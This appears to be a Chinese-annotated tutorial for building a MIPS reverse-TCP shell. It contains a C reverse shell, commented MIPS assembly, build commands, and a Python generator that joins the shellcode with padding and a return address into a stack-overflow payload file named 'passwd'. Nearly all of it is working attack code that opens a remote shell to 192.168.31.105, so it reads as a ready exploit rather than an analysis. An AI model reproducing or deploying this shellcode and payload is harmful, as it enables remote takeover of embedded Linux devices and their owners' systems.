#include "netinet/in.h"
int soc,rc;
struct sockaddr_in serv_addr;
int main()
{
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr=0xc0a81f69;
serv_addr.sin_port=0x7777;
soc=socket(AF_INET,SOCK_STREAM,0);
rc=connect(soc,(struct sockaddr*)&serv_addr,0x10);
dup2(soc,0);
dup2(soc,1);
dup2(soc,2);
execve("/bin/bash",0,0);
}
.section .text
.global __start
.set noreorder
__start:
#sys_socket
#ao = admin
#a1 = type
#a2 = protocol
li $t7,-6
nor $t7,$t7,$zero //$t7 = not($t7 or $zero) = 5
addi $a0,$t7,-3 //$a0 = 2
addi $a1,$t7,-3 //$a1 = 2
slti $a2,$zero,-1 //$a2 = 0
li $v0, 0x1057 //sys_socket系统调用号,通过动态调试C语言版本的代码获得
syscall
#connect
#a0 = socket
#a1 = ser_addr(family(word),port(word),ip(dword),0(qword))
#a2 = len
sw $v0,-1($sp) //$v0 = sys_socket返回值
lw $a0,-1($sp) //$a0 = $v0
li $t7,0xfffd ------------------------------
nor $t7,$t7,$zero
sw $t7,-32($sp) //$t7 = 0000 0002(family)
lui $t6,0x7777
ori $t6,$t6,0x7777
sw $t6,-28($sp) //$t6 = 7777 7777(port)
lui $t6,0xc0a8
ori $t6,$t6,0x1f69 //$t6 = c0a8 1f69(ip address)
sw $t6,-26($sp)
addiu $a1,$sp,-30 //$a1 = ser_addr
li $t4,-17 ------------------------------
nor $a2,$t4,$zero //$a2 = ser_addr len
li $v0, 0x104A ------------------------------
syscall
#dup2
#a0 = oldfd
#a1 = newfd(0,1,2)
li $s1,-3
nor $s1,$s1,$zero //$s1 = 2(0:标准输入 1:标准输出 2:标准错误)
lw $a0,-1($sp) //$a0 = sys_socket返回值
dup2_loop:move $a1,$s1 //$a1 = $s1
li $v0, 0xFDF
syscall
li $s0,-1 //$s0 = -1
addi $s1,$s1,-1 //$s1-=$s1
bne $s1,$s0,dup2_loop //$s1!=$s0 进行循环
#execve
#a0 = filename
#a1 = argv
#a2 = envp
slti $a2,$zero,-1 //$a2 = 0
lui $t7,0x2f2f
ori $t7,$t7,0x6269
sw $t7,-20($sp) //$t7 = -20($sp) = 2f2f 6269 (//bi)
lui $t6,0x6e2f
ori $t6,$t6,0x7368 //$t6 = 6e2f 7368(n/sh)
sw $t6,-16($sp)
sw $zero,-12($sp)
addiu $a0,$sp,-20 //$a0 = //bin/sh
sw $a0,-8($sp)
sw $zero,-4($sp)
addiu $a1,$sp,-8 //$a1 = &(//bin/sh)
li $v0, 0xFAB
syscall
1、execve的定义形式:
int execve(const char *filename, char *const argv[], char *const envp[]);
2、参数说明: const char *filename:执行文件的完整路径。 char *const argv[]:传递给程序的完整参数列表,包括argv[0],它一般是程序的名。 char *const envp[]:一般传递NULL,表示可变参数的结尾。
位于跨平台编译工具buildroot中用来编译汇编源码,-o参数将指定文件编译为中间文件 例如本例中:
mips-linux-as -o s.o ./reverse_tcp_asm.S
位于跨平台编译工具buildroot中用来链接中间文件,-o参数将指定文件链接为可执行文件 例如本例中:
mips-linux_ld s.o -o ./reverse_tcp_asm
#coding=utf-8
import struct
import socket
def makeshellcode(hostip,port):
host = socket.ntohl(struct.unpack('I',socket.inet_aton(hostip))[0])
hosts = struct.unpack('cccc',struct.pack('>L',host))
ports = struct.unpack('cccc',struct.pack('>L',port))
mipsshell = "\x24\x0F\xFF\xFA" # li $t7, 0xFFFFFFFA
mipsshell += "\x01\xE0\x78\x27" # nor $t7, $zero
mipsshell += "\x21\xE4\xFF\xFD" # addi $a0, $t7, -3
mipsshell += "\x21\xE5\xFF\xFD" # addi $a1, $t7, -3
mipsshell += "\x28\x06\xFF\xFF" # slti $a2, $zero, -1
mipsshell += "\x24\x02\x10\x57" # li $v0, 0x1057
mipsshell += "\x00\x00\x00\x0C" # syscall 0
mipsshell += "\xAF\xA2\xFF\xFF" # sw $v0, var_1($sp)
mipsshell += "\x8F\xA4\xFF\xFF" # lw $a0, var_1($sp)
mipsshell += "\x34\x0F\xFF\xFD" # li $t7, 0xFFFD
mipsshell += "\x01\xE0\x78\x27" # nor $t7, $zero
mipsshell += "\xAF\xAF\xFF\xE0" # sw $t7, var_20($sp)
mipsshell += "\x3C\x0E" + struct.pack('2c',ports[2],ports[3])
mipsshell += "\x35\xCE" + struct.pack('2c',ports[2],ports[3]) # li $t6, ports
mipsshell += "\xAF\xAE\xFF\xE4" # sw $t6, var_1C($sp)
mipsshell += "\x3C\x0E" + struct.pack('2c',hosts[0],hosts[1]) # li $t6, host[0]+host[1]
mipsshell += "\x35\xCE" + struct.pack('2c',hosts[2],hosts[3]) # li $t6, host[2]+host[3]
mipsshell += "\xAF\xAE\xFF\xE6" # sw $t6, var_1C+2($sp)
mipsshell += "\x27\xA5\xFF\xE2" # addiu $a1, $sp, var_20+2
mipsshell += "\x24\x0C\xFF\xEF" # li $t4, 0xFFFFFFEF
mipsshell += "\x01\x80\x30\x27" # nor $a2, $t4, $zero
mipsshell += "\x24\x02\x10\x4A" # li $v0, 0x104A
mipsshell += "\x00\x00\x00\x0C" # syscall 0
mipsshell += "\x24\x11\xFF\xFD" # li $s1, 0xFFFFFFFD
mipsshell += "\x02\x20\x88\x27" # nor $s1, $zero
mipsshell += "\x8F\xA4\xFF\xFF" # lw $a0, var_1($sp)
mipsshell += "\x02\x20\x28\x25" # move $a1, $s1
mipsshell += "\x24\x02\x0F\xDF" # li $v0, 0xFDF
mipsshell += "\x00\x00\x00\x0C" # syscall 0
mipsshell += "\x24\x10\xFF\xFF" # li $s0, 0xFFFFFFFF
mipsshell += "\x22\x31\xFF\xFF" # addi $s1, -1
mipsshell += "\x16\x30\xFF\xFA" # bne $s1, $s0, dup2_loop
mipsshell += "\x28\x06\xFF\xFF" # slti $a2, $zero, -1
mipsshell += "\x3C\x0F\x2F\x2F"
mipsshell += "\x35\xEF\x62\x69" # li $t7, 0x2F2F6269
mipsshell += "\xAF\xAF\xFF\xEC" # sw $t7, var_14($sp)
mipsshell += "\x3C\x0E\x6E\x2F"
mipsshell += "\x35\xCE\x73\x68" # li $t6, 0x6E2F7368
mipsshell += "\xAF\xAE\xFF\xF0" # sw $t6, var_10($sp)
mipsshell += "\xAF\xA0\xFF\xF4" # sw $zero, var_C($sp)
mipsshell += "\x27\xA4\xFF\xEC" # addiu $a0, $sp, var_14
mipsshell += "\xAF\xA4\xFF\xF8" # sw $a0, var_8($sp)
mipsshell += "\xAF\xA0\xFF\xFC" # sw $zero, -4($sp)
mipsshell += "\x27\xA5\xFF\xF8" # addiu $a1, $sp, var_8
mipsshell += "\x24\x02\x0F\xAB" # li $v0, 0xFAB
mipsshell += "\x00\x00\x00\x0C" # syscall
return mipsshell
if __name__ == '__main__':
print '[*]prepare shellcode'
cmd = 'sh'
cmd += '\x00'*(4-len(cmd)%4)
#payload
payload = 'A'*0x19c
payload += struct.pack('>L',0x40800498) #需要调试获得堆栈地址
payload += makeshellcode('192.168.31.105',0x7777) #传入参数ip地址和端口
print 'ok'
#createfile passwd
print '[+] careate passwd file'
fw = open('passwd','w')
fw.write(payload)
fw.close()
print 'create file success'